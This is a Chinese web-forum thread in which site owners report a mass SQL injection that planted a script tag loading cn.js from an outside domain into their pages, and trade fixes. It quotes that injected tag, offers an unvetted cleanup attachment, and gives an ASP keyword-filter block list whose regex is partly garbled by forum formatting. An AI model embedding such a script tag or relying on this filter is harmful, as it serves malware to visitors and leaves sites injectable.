瑞星卡卡安全论坛

网站出现问题。技术员说数据库被注入。所有能打开的网站都出现这样的代码 <script src=http://cn.daxia123.cn/cn.js></script> 。还有谁遇到这样的问题没有？交流一下，是怎样解决的？今天上网看了一下，又这样的代码的还不在少数，好多都关闭了。哪位朋友有好的解决方法？

我的网站是自助建站系统，好多客户的网站打开后界面都错位了。点击链接没有反应。有的图片不能显示。我的是从前天（12.25号）开始的。昨天没有办法我关闭了。
用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TheWorld)

楼主试试附件
（有一定风险）

附件: 网页感染清除精灵1.1.rar

楼主遇到高人了。。

我也恨死了这人下病毒的
一个朋友自己维护了一个动网的论坛。都是免费给大家提供一个平台，这两天被这个家伙害得只能停站，由于动网论坛程序有点复杂，一时半会儿查不出哪个页面的漏洞，我帮他一个一个表去清掉那些代码，10分钟不到还变本加历地又灌了其它好几个表。。气得我直骂这个狗日的。

有小聪明去做点正经事呀。

如果楼主有相应的资料，可以去报案，他的脚本中的代码完全暴露了他自己的用心，

可恶极了...我两个站都被注入, 昨天中午开始的, 还原后四个小时左右又追上了,.更恶的注入...支持报案,...还没有找到合适的解决方法,,  :default4:

我的网站也被注入了，，网站现在是停止状态，，哪位高人有解决方法？

我的也被注入。。。关注

可能是一些小黑客弄的鬼
不用怕的，网络上有相关的病毒清除器
你说的这种情况叫“挂马”
被人挂了恶意代码在网页里面

数据库注入要解决的话 你应该说下相关的情况  比如你用的什么数据库之类的，
最好把站点地址 发出来，像 你说的那个人什么都知道，那是用了社工的手段
了解到你的一些情况的，相关情况不清楚的可以了，联系我qq，也可以找专业点的人帮忙

我的是ms sql2000的..  应该大部分都是MS SQL吧

解决办法：1 严格过滤 request.form 和 request.querystring 获取的内容，坚决不用 request("name") 这样的方式获取值，凡是采用 cookies 保存的内容，尽量不要用在sql语句里进行查询数据库操作；2 重要的用户资料尽量采用 session 验证，因为session是服务器端的，客户端无法伪造数据，除非他有你服务器的权限。

可以采用以下的防范 get 、post以及cookies 注入的代码来过滤 sql 注入攻击：


<%
Response.Buffer = True  '缓存页面
'防范get注入
If Request.QueryString <> ""  Then StopInjection(Request.QueryString)
'防范post注入
If Request.Form <> ""  Then StopInjection(Request.Form)
'防范cookies注入
If Request.Cookies <> ""  Then StopInjection(Request.Cookies)
'正则子函数
Function StopInjection(Values)
Dim regEx
Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Pattern = "'|;|#|([\s\b+()]+([email=select%7Cupdate%7Cinsert%7Cdelete%7Cdeclare%7C@%7Cexec%7Cdbcc%7Calter%7Cdrop%7Ccreate%7Cbackup%7Cif%7Celse%7Cend%7Cand%7Cor%7Cadd%7Cset%7Copen%7Cclose%7Cuse%7Cbegin%7Cretun%7Cas%7Cgo%7Cexists)[/s/b]select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|retun|as|go|exists)[\s\b[/email]+]*)"
    Dim sItem, sValue
    For Each sItem In Values
        sValue = Values(sItem)
        If regEx.Test(sValue) Then
            Response.Write "<Script Language=javascript>alert('非法注入！你的行为已被记录！！');history.back(-1);</Script>"
            Response.End
        End If
    Next
    Set regEx = Nothing
End function
%>

    把以上的代码另存为一个文件，如 antisql.asp ，然后在数据库连接文件开头包含这个文件 <!--#include file="antisql.asp"--> ，就可以实现全站的防范 sql 注入的攻击了。

感谢 xutingxin ！我网站暂时得到控制。昨晚守到12点没出现问题。:default5:

把以上的代码另存为一个文件，如 antisql.asp ，然后在数据库连接文件开头包含这个文件 <!--#include file="antisql.asp"--> ，就可以实现全站的防范 sql 注入的攻击了。

加在文件的第一行包含就行了

我对楼上的做一下补充
这个防注入只是相对的
并不能完全杜绝有人注入
因为网络中有相关的对付防注入的入侵手法
所以建议各位站长使用网站程序的使用，使用名气大一点的程序
那样补丁更新的即时一些
还有就是密码设置强壮一点
不要只是数字，字母，另外可以修改下后台登陆路径等等
都是相应的处理办法

我的也是sql server 2000

我们的两个网站都被注入了。现在该如何办呀。郁闷呢。:default2:

我按 xutingxin 说的做了，看行不行，先谢谢！

狗日的.钢清理完.数据库里又有了..真xxx没爹.搜到这个人.非弄死他不可

这个东西很烦的，搞的俺换了个服务器，目前正常运行了三天，我自己加了一些其它的防注入代码，不知道有没有效呢……

我操,我也被注入了:default4:

现在网站还有问题吗？很想知道，我也是这种情况。

我已彻底解决数据库被注入http://cn.daxia123.cn/cn.js
欢迎联系:qq:378174581,email:qyhszzj@126.com

我已彻底解决数据库被注入http://cn.daxia123.cn/cn.js,
联系qq:378174581,Email:qyhszzj@126.com